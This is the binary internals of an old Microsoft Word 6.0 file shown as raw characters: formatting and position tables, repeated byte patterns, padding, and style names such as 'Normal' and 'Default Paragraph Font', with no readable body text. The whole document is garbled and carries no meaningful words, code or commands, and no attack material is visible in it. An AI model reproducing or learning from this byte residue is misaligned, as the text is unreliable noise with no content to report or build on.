  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !Y Y Y Z Z Z 'Z ;Z CZ [Z Z Z Z Z Z Z Z Z Z Z [ 0[ ][ u[ v[ [ [ [ [ [ \ T\ U\ ^\ þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !^\ k\ l\ \ \ \ \ \ \ ] ] ] ] (] 9] :] M] k] u] ] ] ] ] ] ] ] ] 5^ C^ D^ M^ P^ Q^ R^ þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !R^ S^ Y^ ^ ^ ^ ^ >_ ?_ @_ J_ _ _ _ _ _ _ _ _ _ `  ` $` %` <` U` l` ` ` ` ` ` ` a ~ytoje`[V   ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
] ^bc  ] bc  ] bc  ] bc  
] ^bc  ] bc  ] bc  ] bc  
] ^bc  ] bc  ] bc  ] bc  
] ^bc  ] bc   !a !a 8a Pa ma na a a a a a b "b #b 6b 9b Mb _b sb b b b b b b b b b c c #c .c /c Ac þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !Ac Vc Wc kc c c c c c c c c c c $d .d 1d Kd md xd {d d d d d d d  e ,e /e 0e De Ge Oe þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !Oe Ye \e e e e e e e e e e e e e e f 
f .f Ff gf jf f f f f f f f g /g :g =g fg þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !fg g g g h Ah qh h h h h h h h 
i #i 9i Xi ii li i i i j %j (j :j Ej aj rj }j j j j þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !j j j j j j j j j j k k #k Mk k k k k k k k k k l l ?l rl l l l l l l l þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !l l l "m <m Mm Vm Ym gm m m m m m m n $n 9n :n Gn n n n n n n n n o !o 2o Co Uo ko þ}xsnid_Z           ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !ko o o o o p p p p p p 	q 
q q 2q 3q r r r s s 
s s s [t \t t t t t t &v 'v v ½|wrmhc^Y         ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
] ^bc   ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   !v v v v v  w w w w w w w Uw Vw w w  x x x x x x x x x x x x x x x  x !x "x #x $x ~zvrnjfb^Z ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ]	 bc   ]	 bc   ]	 bc   ]	 bc   ] bc   ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  
] ^bc  
] ^bc  
] ^bc   ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc   #$x %x &x 'x (x )x *x +x ,x -x .x /x 0x 1x 2x 3x 4x 5x 6x 7x 8x 9x :x ;x <x =x >x ?x @x Ax Bx Cx Dx Ex Fx Gx Hx Ix Jx ÿzupkea] c  
] ^bc  ] bc  ] bc  ] bc  ] bc  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &Jx Kx Lx Mx Nx Ox Px Qx Rx Sx Tx Ux Vx Wx Xx Yx Zx [x \x ]x ^x _x `x ax bx cx dx ex fx gx hx ix jx kx lx mx ½{wsojfb^         ] c  ] c  ] c  ] ^c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] bc  ] bc  
] ^bc  
] ^bc  ] bc  ] bc  ] bc  ] bc  
] ^bc  
] ^bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] bc  ] c   #mx nx ox px qx rx sx tx ux vx wx xx yx zx {x |x }x ~x x x x x x x x x x x x x x x x x x x x x x ÿ{wsokg            ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   &x x x x x x x x x                                                                                                                                                                                                                                                                                                                                                                                                                   ] c  ] c  ] c  ] c  ] c  ] c  ] c  ] c   V  `  k  l  u  v        2  \            1  V          P         5  p                                                                                                                                                                                                                                                                                                                               !          Z	        A  Q      A                M  N    >$  ?$  %  %  	&  &  1&  B&  ^&  m&                                                                                                                                                                                                                                                                                                                       !m&  &  &  &  &  &  &  '  &'  ?'  i'  '  '  '  '  '  '  (  !(  =(  O(  k(  }(  (  (  (  (  :)  ;)  *  *  ,  ,  ,                                                                                                                                                                                                                                                                                                                       !,  ,  -  0.  1.  z/  {/  ;0  <0  '1  (1  ~1  1  1  1  1  	2  $2  52  O2  j2  2  2  2  2  2  2  2  3  3  83  93  :3  7                                                                                                                                                                                                                                                                                                                       !7  8  8  8  _:  `:  a:  4;  ;  ;  ;  <  <  <  >  >  >  ?  O?  ?  @  h@  @  @  @  iA  jA  kA  lA  mA  A  A  B  B                                                                                                                                                                                                                                                                                                                       !B  C  C  D  D  E  E  E  }F  ~F  ]G  kG  "H  #H  J  J  K  K  M  M  O  O  P  P  P  P  2Q  3Q  4Q  5Q  6Q  kQ  lQ  Q                                                                                                                                                                                                                                                                                                                       !Q  Q  R  'R  ZR  [R  7S  cS  S  0T  1T  TT  fT  T  T  T  U  7U  bU  U  U  V  V  V  V  2X  >X  iX  X  X  ^Y  _Y  Y  Y                                                                                                                                                                                                                                                                                                                       !Y  6Z  QZ  Z  O[  P[  Q[  R[  S[  }[  ~[  [  \  4]  ]  ^  ?^  ^  ^  b  b  pc  c  c  d  d  oe  ~e  e  e  e  
g  g  g                                                                                                                                                                                                                                                                                                                       !g  h  h  ,i  Hi  Ii  i  i  i  i  i  i  i  j  j  j  j  *j  Vj  aj  hj  rj  uj  }j  j  j  j  j  j  j  j  j  j  j                                                                                                                                                                                                                                                                                                                       !j  j  2k  k  l  Ml  l  l  m  m  m  n  n  n  n  n  ;n  <n  p  :r  =s  Vs  t  t  6u  v  v   v  !v  "v  Ov  Pv  lv  v                                                                                                                                                                                                                                                                                                                       !v  v  v  v  nx  ox  x  x  y  y  y  z  z  "z  )z  1z  8z  ?z  Gz  z  z  z  {  k{  {  {  {  K|  Q|  d|  |  |  |  |                                                                                                                                                                                                                                                                                                                   !|  }  G}  H}  }  }  *~  W~  \~  ~  ~    ]        6  x          
  a  s  x  }            ~  7                                                                                                                                                                                                                                                                                                                 !7  8  9  :  ;  c  d         T  q    ͍      F  g      >  T    +  R  n                                                                                                                                                                                                                                                                                                    .  O  t                  f  g  r      ٓ    -  X  }          ͔                                                                                                                                                                                                                                                                                           /  O  n                          *  7  9  D  J  W  Y  d  e                                                                                                                                                                                                                                                                                                 
    h  i  n          R    ̜    U  h  i  j  k  l      ߠ  u  w          Т                                                                                                                                                                                                                                                                                         Т        /  C  L  s      ԣ    	  %  B  o    ä  פ    
    ;  K  c  l  {        ߥ    ۲  ܲ                                                                                                                                                                                                                                                                                                                   !ܲ  0  1            "  u  v      ݴ    ;        i           >  ^      ڷ      2  H  I                                                                                                                                                                                                                                                                                                                       !I          %  &  j  k      ڹ  ۹      T  U          @  A      л  ѻ      V  W                                                                                                                                                                                                                                                                                                                             !    f  g    5  6  7  8  9  ^  _    \              4  V        j  }  ~                                                                                                                                                                                                                                                                                                                                   !            B                    	       0        3  Q  l                ;                                                                                                                                                                                                                                                                                                                       !;  f  }            U  5    @  B  C  D  E  {  |  5  T  $  9          	  ;  <      0  f                                                                                                                                                                                                                                                                                                                         !      s    	  Q  u                    
  %  ;  i        U  ,  u                                                                                                                                                                                                                                                                                                                                     !        4  X  Y        w  x  y  z  {      G        3              U                                                                                                                                                                                                                                                                                                                                 !            W  X    _  `  m      2  |          L  M  N  O  P  Q      2  3  (      M                                                                                                                                                                                                                                                                                                                       !M      (          H                  .      ! Z [ X    a                                                                                                                                                                                                                                                                                                                          !      	 >	 ?	 b	 	 	 	 	 
  L M $ 6 F Y o    .
 
 
 
 
 
                                                                                                                                                                                                                                                                                                                        !  q            9        R S         4                                                                                                                                                                                                                                                                                                                       !              ! @! ! " ." I" g" " " " " B# # # # # ($ ;$ W$ X$ $ $ B% %                                                                                                                                                                                                                                                                                                                      !% % -& /& ( z) 5* * + 8+ - t- - - - - i. . / 0 0 
1 g1 w2 x2 y2 z2 {2 2 2 >3 3 3 R4                                                                                                                                                                                                                                                                                                                      !R4 S4 c4 4 J5 5 6 6 7 X7 7 8 f8 9  : 0: U; r; < 8< < P= = p> > -? y? nA A B %C D F #G                                                                                                                                                                                                                                                                                                                      !#G G I I I :J J J gK K <L aL !M OM ^M M QN [N N N N N N N 4O O AP xP 9Q Q Q Q 9R 
S                                                                                                                                                                                                                                                                                                                      !
S S T nU U 'V {V W W X X X Z Z v[ [ U\ l\ \ ] :] ] D^ Q^ R^ ^ ?_ _ _ %` na #b b /c                                                                                                                                                                                                                                                                                                                      !/c Wc c 0e e j k k l m :n n o o p p p p p 
q q 3q r r s 
s s \t t t t 'v v v                                                                                                                                                                                                                                                                                                                      !v v  w w w w w w Vw w x x x x x x x x x x x x  x !x "x #x $x %x &x 'x (x )x *x +x                                                                                                                                                                                                                                                                                                                !+x ,x -x .x /x 0x 1x 2x 3x 4x 5x 6x 7x 8x 9x :x ;x <x =x ?x @x Ax Bx Cx Dx Ex Fx Gx Hx Ix Jx Kx Lx Mx                                                                                                                                                                                                                                                                                                                    !Mx Nx Ox Px Qx Rx Sx Tx Ux Vx Xx Yx Zx [x \x ]x _x `x ax bx dx ex fx gx hx ix jx kx lx mx nx ox px                                                                                                                                                                                                                                                                                                     px ux vx xx yx zx {x |x }x ~x x x x x x x x x x x x x x x x x x x x x x x x x                                                                                                                                                                                                                                                                                                                    !x x x x x                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    V  x  V  x     Eu     p     K        @  Normal     a                   " A@ " Default Paragraph Font                                                                                              @                                                                                                                                                                                                                                                                                  
   	           F   Document Microsoft Word 6.0 
   MSWordDoc    Word.Document.6 9q                                                                                                                                                                                                                                                                                                                                                                                                                              